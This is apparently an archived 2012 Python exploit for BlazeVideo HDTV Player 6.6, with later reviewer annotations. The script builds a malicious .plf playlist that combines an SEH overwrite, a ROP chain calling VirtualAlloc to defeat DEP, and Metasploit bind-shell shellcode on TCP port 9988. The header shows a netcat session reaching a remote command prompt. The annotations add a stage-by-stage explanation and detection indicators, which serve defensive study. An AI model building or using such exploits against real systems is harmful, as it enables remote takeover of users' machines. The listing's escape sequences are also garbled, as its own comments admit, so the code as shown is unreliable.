
# Title : BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR
# Published : 2012-04-03
# Author :


#!/usr/bin/python -w

#-----------------------------------------------------------------------------------#
# Exploit: BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR                     #
# Author: b33f - http://www.fuzzysecurity.com/                                      #
# OS: Tested on Windows 7 32-bit PRO SP1                                            #
# Software Link: http://www.blazevideo.com/download.htm                             #
#                Pro v6.6 - Apr 12, 2011                                            #
#-----------------------------------------------------------------------------------#
# The opportunity to secure ourselves against defeat lies in our own hands          #
# but the opportunity of defeating the enemy is provided by the enemy himself.      #
# - Sun Tzu                                                                         #
#-----------------------------------------------------------------------------------#
# Special thanks:                                                                   #
# Lincoln - Thx for the assist!                                                     #
# corelanc0d3r - Thx for taking the time to go over my work and pointing me         #
#                at VirtualAlloc()!                                                 #                                  
#-----------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.129 9988                                            #
# (UNKNOWN) [192.168.111.129] 9988 (?) open                                         #
# Microsoft Windows [Version 6.1.7601]                                              #
# Copyright (c) 2009 Microsoft Corporation.  All rights reserved.                   #
#                                                                                   #
# C:\Program Files\BlazeVideo\BlazeVideo HDTV Player 6.6 Professional>           #
#-----------------------------------------------------------------------------------#

# Name of the crafted playlist written at the end of the script. The file is
# the entire delivery mechanism: nothing here contacts a target, and the
# overflow presumably fires when the player parses this .plf (the trigger
# itself is not shown on this page).
filename = "blaze.plf"

#-----------------------------Pivot-Align-----------------------------#
# Stage 1: the overwritten SEH handler slot. Instead of a real handler it
# holds a gadget that lifts ESP by 0x800 and returns, so execution continues
# from attacker-controlled data on the stack. The address is absolute, which
# only works while the module hosting the gadget is loaded at a fixed base
# (presumably a DLL without ASLR support shipped with the player; the page
# does not name the module). SEHOP / mandatory ASLR are the platform-level
# mitigations this stage depends on being absent.
SEH = "x95x53x30x61"  # Pivot; ADD ESP,800 # RETN
# Alignment filler so the pivoted ESP lands exactly on `stack` below.
pad = "b33f"*35           # pad ESP to our alignment (140-bytes)

#------------------Save Stack Pointer in EDI&EAX&ESI------------------#
# Stage 2: copy the current ESP into EDI, EAX and ESI (three snapshots taken
# one RETN apart) so the later stages can compute frame addresses relative to
# the pivoted stack. The closing ADD ESP,20 hops over the 0x20-byte
# VirtualAlloc frame that follows (`params` is eight dwords) so the next
# gadget executed is the first entry of `rop`.
stack = (
"xC5x30x03x64"  # PUSH ESP # MOV EAX,EDI # POP EDI # POP ESI # RETN
"x41x41x41x41"  # Padding for POP ESI
"x24x60x02x64"  # PUSH ESP # POP ESI # RETN
"xEEx65x03x64"  # XCHG EAX,ESI # RETN
"x24x60x02x64"  # PUSH ESP # POP ESI # RETN
"xBFxCDx02x64") # ADD ESP,20 # RETN

#----------------------------VirtualAlloc()---------------------------#
# Stage 3: a VirtualAlloc call frame placed on the pivoted stack. Only the
# first dword is meaningful at this point: it is a pointer slot that the last
# ROP stage dereferences twice and overwrites with the resolved function
# address (so the value presumably points at an import-table entry; the page
# does not say which module). The letter placeholders are patched in place by
# the ROP stages with the values noted in the trailing comments:
# dwSize 0x1, flAllocationType 0x1000 (MEM_COMMIT), flProtect 0x40
# (PAGE_EXECUTE_READWRITE). lpAddress is written twice because the first copy
# also serves as the return address once VirtualAlloc returns (see the
# lpAddress chain in `rop`).
params = (
"xB4x11x34x60"  # VirtualAlloc()
"WWWW"              # lpAddress  We need this value twice for alignment!
"WWWW"              # lpAddress /
"XXXX"              # dwSize (0x1)
"YYYY"              # flAllocationType (0x1000)
"ZZZZ"              # flProtect (0x40)
"x41x41x41x41"  # Padding
"x41x41x41x41") # Padding

#-----------------------ROP Chain - lpAddress-------------------------#
# Stage 4: fill in the VirtualAlloc frame from `params`, then re-pivot ESP
# onto it so the call is made and returns into the NOP sled. If it succeeds,
# the stack region holding the payload is committed with flProtect 0x40
# (PAGE_EXECUTE_READWRITE), which is the DEP bypass. Every gadget address is
# absolute, so the whole chain assumes the hosting module(s) are never
# rebased; system-wide mandatory ASLR, or a rebuild of the affected DLL with
# ASLR support, breaks it.
rop = (
# -- lpAddress: EAX (a saved stack pointer) + 0x1E0 is stored at both
#    [ESI+10] and [ESI+14] after ESI is walked back by 8.
"xF7x24x03x64"  # ADD EAX,20 # RETN
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  | ADD EAX 1E0
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  |
"xF7x24x03x64"  # ADD EAX,20 # RETN  /
# NOTE(review): each DEC ESI gadget also ANDs a byte at [EDI-18]; that write
# is presumably harmless only because EDI still holds a stack address from
# stage 2 at this point.
"xCBx06x11x64"  # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN
"xCBx06x11x64"  # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN |
"xCBx06x11x64"  # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | DEC ESI 8
"xCBx06x11x64"  # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | We need lpAddress twice to return to the proper
"xCBx06x11x64"  # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | place after executing VirtualAlloc(), the lpAddress
"xCBx06x11x64"  # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | parameters are located at ESI+10 and ESI+14
"xCBx06x11x64"  # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN |
"xCBx06x11x64"  # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN /
"xCAxB5x33x60"  # MOV DWORD PTR DS:[ESI+10],EAX # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"x41x41x41x41"  # Padding for POP ESI
"x41x41x41x41"  # Padding for POP EBX

#------------------------ROP Chain - dwSize---------------------------#
# -- dwSize: EAX is zeroed (the XOR in the XCHG gadget), incremented to 1,
#    and stored at [ESI+14] after ESI is bumped by 4 -> dwSize = 0x1.
"xD3xB1x04x64"  # PUSH EAX # POP ESI # RETN 04
"xCAx71x04x64"  # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04
"x41x41x41x41"  # Padding for RETN 04
"x6DxA1x03x64"  # INC EAX # RETN
"x41x41x41x41"  # Padding for RETN 04
"x15x14x03x64"  # INC ESI # RETN
"x15x14x03x64"  # INC ESI # RETN
"x15x14x03x64"  # INC ESI # RETN
"x15x14x03x64"  # INC ESI # RETN
"x90x73x64x61"  # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"x41x41x41x41"  # Padding for POP ESI
"x41x41x41x41"  # Padding for POP EBX

#-------------------ROP Chain - flAllocationType----------------------#
# -- flAllocationType: POP 0xFFFFEFFF, NEG gives 0x1001, DEC gives 0x1000
#    (the value is built this way to avoid raw NUL bytes in the file).
"xD3xB1x04x64"  # PUSH EAX # POP ESI # RETN 04
"xCAx71x04x64"  # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04
"x41x41x41x41"  # Padding for RETN 04
"x13x30x10x64"  # POP EAX # RETN
"x41x41x41x41"  # Padding for RETN 04
"xFFxEFxFFxFF"  # 0xFFFFEFFF
"xCBx6Ex33x61"  # NEG EAX # RETN
"x2Cx4Ex10x64"  # DEC EAX # RETN
"x15x14x03x64"  # INC ESI # RETN
"x15x14x03x64"  # INC ESI # RETN
"x15x14x03x64"  # INC ESI # RETN
"x15x14x03x64"  # INC ESI # RETN
"x90x73x64x61"  # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"x41x41x41x41"  # Padding for POP ESI
"x41x41x41x41"  # Padding for POP EBX

#-----------------------ROP Chain - flProtect-------------------------#
# -- flProtect: EAX zeroed, then two ADD EAX,20 -> 0x40 (PAGE_EXECUTE_READWRITE).
"xD3xB1x04x64"  # PUSH EAX # POP ESI # RETN 04
"xCAx71x04x64"  # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04
"x41x41x41x41"  # Padding for RETN 04
"xF7x24x03x64"  # ADD EAX,20 # RETN
"x41x41x41x41"  # Padding for RETN 04
"xF7x24x03x64"  # ADD EAX,20 # RETN
"x15x14x03x64"  # INC ESI # RETN
"x15x14x03x64"  # INC ESI # RETN
"x15x14x03x64"  # INC ESI # RETN
"x15x14x03x64"  # INC ESI # RETN
"x90x73x64x61"  # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"x41x41x41x41"  # Padding for POP ESI
"x41x41x41x41"  # Padding for POP EBX

#-----------------ROP Chain - Fix PTR VirtualAlloc()------------------#
# -- Resolve the function pointer: ESI now points at the first dword of
#    `params`; EAX is dereferenced twice (first fetching the slot value from
#    the frame, then the function address it points to) and the result is
#    written back over the slot. EDI (a stack-derived value from the XCHG
#    above) is then adjusted by 4 and moved into ESP, so the following RETN
#    pops the resolved address and calls VirtualAlloc with the frame as its
#    arguments.
"xD3xB1x04x64"  # PUSH EAX # POP ESI # RETN 04
"x0BxA8x03x64"  # MOV EAX,DWORD PTR DS:[EAX] # RETN
"x41x41x41x41"  # Padding for RETN 04
"x0BxA8x03x64"  # MOV EAX,DWORD PTR DS:[EAX] # RETN
"x64x40x04x64"  # MOV DWORD PTR DS:[ESI],EAX # POP ESI # RETN
"x41x41x41x41"  # Padding for POP ESI
"x16xA4x04x64"  # MOV EAX,EDI # POP EDI # POP ESI # RETN
"x41x41x41x41"  # Padding for POP EDI
"x41x41x41x41"  # Padding for POP ESI
"x6DxA1x03x64"  # INC EAX # RETN
"x6DxA1x03x64"  # INC EAX # RETN
"x6DxA1x03x64"  # INC EAX # RETN
"x6DxA1x03x64"  # INC EAX # RETN
"xC6x2Ax03x64") # PUSH EAX # POP ESP # RETN

#-------------------------------------------------------------------------------------#
# We have an ample amount of space...                                                 #
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c   #
# [*] x86/alpha_mixed succeeded with size 743 (iteration=1)                           #
#-------------------------------------------------------------------------------------#
# Encoded payload, reproduced as found. Per the header comment above it is
# msfpayload windows/shell_bind_tcp LPORT=9988 run through x86/alpha_mixed
# (743 bytes); the session recorded in the file header (nc to port 9988
# yielding a cmd.exe prompt in the player's install directory) matches that.
# Defender's view: a successful run leaves a new listener on TCP 9988,
# presumably inside the player process, which is the network-side indicator
# to alert on; the alpha-mixed encoding also means the on-disk .plf is
# almost entirely printable, so size and filler patterns are better
# file-based signals than byte signatures.
shellcode = (
"x89xe5xdaxd8xd9x75xf4x5ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax43x43x43x43x43x43x37x52x59x6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x39"
"x6cx79x78x6bx39x63x30x57x70x55x50x31x70x6bx39"
"x39x75x30x31x78x52x45x34x6ex6bx70x52x36x50x6e"
"x6bx32x72x34x4cx4cx4bx50x52x77x64x4cx4bx50x72"
"x74x68x54x4fx68x37x31x5ax51x36x65x61x6bx4fx74"
"x71x59x50x6ex4cx75x6cx75x31x53x4cx63x32x54x6c"
"x31x30x4fx31x38x4fx44x4dx56x61x78x47x6bx52x78"
"x70x76x32x73x67x4ex6bx43x62x52x30x4ex6bx70x42"
"x37x4cx43x31x4ax70x4ex6bx67x30x42x58x6dx55x6f"
"x30x31x64x62x6ax37x71x7ax70x62x70x4ex6bx42x68"
"x72x38x6ex6bx32x78x75x70x67x71x4bx63x6dx33x45"
"x6cx73x79x4cx4bx57x44x6ex6bx43x31x5ax76x66x51"
"x4bx4fx65x61x79x50x6ex4cx6fx31x38x4fx44x4dx36"
"x61x48x47x47x48x6dx30x53x45x6cx34x56x63x51x6d"
"x58x78x55x6bx63x4dx55x74x61x65x6ax42x36x38x4c"
"x4bx36x38x77x54x36x61x38x53x31x76x4ex6bx34x4c"
"x72x6bx4cx4bx53x68x67x6cx77x71x39x43x4ex6bx66"
"x64x4cx4bx43x31x48x50x4cx49x53x74x35x74x35x74"
"x43x6bx33x6bx30x61x73x69x71x4ax62x71x49x6fx6d"
"x30x50x58x31x4fx61x4ax4ex6bx42x32x38x6bx6dx56"
"x43x6dx33x58x75x63x74x72x57x70x35x50x50x68x42"
"x57x51x63x70x32x43x6fx73x64x33x58x32x6cx51x67"
"x56x46x76x67x6bx4fx4bx65x6fx48x6cx50x63x31x63"
"x30x73x30x37x59x78x44x72x74x32x70x55x38x64x69"
"x6dx50x50x6bx43x30x69x6fx4ex35x72x70x72x70x56"
"x30x42x70x63x70x50x50x61x50x62x70x30x68x79x7a"
"x76x6fx4bx6fx6dx30x59x6fx79x45x4ex69x79x57x44"
"x71x39x4bx56x33x65x38x76x62x35x50x57x57x76x64"
"x6dx59x6bx56x51x7ax62x30x33x66x56x37x65x38x59"
"x52x49x4bx77x47x55x37x59x6fx59x45x46x33x51x47"
"x45x38x6cx77x39x79x65x68x39x6fx59x6fx6bx65x46"
"x33x56x33x73x67x72x48x74x34x7ax4cx37x4bx59x71"
"x6bx4fx68x55x61x47x6fx79x78x47x43x58x50x75x62"
"x4ex70x4dx53x51x49x6fx7ax75x35x38x32x43x30x6d"
"x42x44x75x50x6cx49x48x63x72x77x46x37x33x67x56"
"x51x69x66x42x4ax57x62x50x59x70x56x59x72x69x6d"
"x43x56x4bx77x77x34x75x74x77x4cx77x71x56x61x4c"
"x4dx37x34x31x34x44x50x58x46x37x70x51x54x31x44"
"x52x70x42x76x46x36x51x46x67x36x43x66x50x4ex43"
"x66x42x76x43x63x71x46x45x38x53x49x48x4cx37x4f"
"x4bx36x59x6fx58x55x4bx39x6bx50x62x6ex56x36x61"
"x56x4bx4fx30x30x31x78x77x78x4ex67x47x6dx33x50"
"x49x6fx6bx65x4dx6bx48x70x6dx65x4ex42x32x76x65"
"x38x59x36x4fx65x6fx4dx4dx4dx49x6fx78x55x47x4c"
"x33x36x71x6cx57x7ax4bx30x39x6bx6bx50x53x45x64"
"x45x4fx4bx53x77x75x43x44x32x50x6fx32x4ax43x30"
"x50x53x49x6fx48x55x41x41")

# Final file layout, assembled from the stages above:
#   ph33r  - NOP sled followed by the encoded payload
#   b00m   - SEH overwrite, alignment pad, stack snapshot, VirtualAlloc
#            frame, ROP chain, then ph33r
#   buffer - 872 bytes of "A" filler, b00m, then "B" filler up to a fixed
#            total, i.e. 5000 bytes whenever b00m fits in 4128
# A .plf of that exact size consisting mostly of "A"/"B" runs plus printable
# alpha-mixed bytes is the on-disk artefact a file-based detection can key
# on. NOTE(review): in this copy of the listing the backslashes of every
# "\x.." escape have been lost in extraction, so the literal lengths and
# bytes here differ from what the author's original script produced.
ph33r = ("x90" * 160) + shellcode
b00m = "".join([SEH, pad, stack, params, rop, ph33r])
buffer = "".join(["A" * 872, b00m, "B" * (4128 - len(b00m))])

# Write the playlist; the script ends here and relies on the file being
# opened in the player.
textfile = open(filename, 'w')
textfile.write(buffer)
textfile.close()